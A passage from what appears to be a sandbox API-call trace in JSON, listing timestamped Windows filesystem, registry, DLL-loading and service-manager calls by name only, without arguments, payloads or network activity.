17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:36,034", "api": "CreateProcessInternalW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegSetValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrLoadDll"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtOpenFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:36,044", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtQueryDirectoryFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,044", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,044", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,044", "api": "NtQueryValueKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtQueryDirectoryFile"}, {"category": "services", "timestamp": "2016-02-16 17:41:36,044", "api": "OpenSCManagerW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtQueryDirectoryFile"}, {"category": "services", "timestamp": "2016-02-16 17:41:36,054", "api": "OpenServiceW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,054", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,054", "api": "NtQueryValueKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtDeviceIoControlFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtDeviceIoControlFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtReadFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,054", "api": "LdrLoadDll"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,054", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,054", "api": "RegQueryInfoKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,054", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,054", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtReadFile"}, {"category": "services", "timestamp": "2016-02-16 17:41:36,054", "api": "OpenSCManagerW"}, {"category": "services", "timestamp": "2016-02-16 17:41:36,054", "api": "OpenServiceW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtQueryDirectoryFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,054", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,054", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,054", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,054", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,054", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:41:36,054", "api": "DeviceIoControl"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,054", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,054", "api": "NtQueryValueKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtDeviceIoControlFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 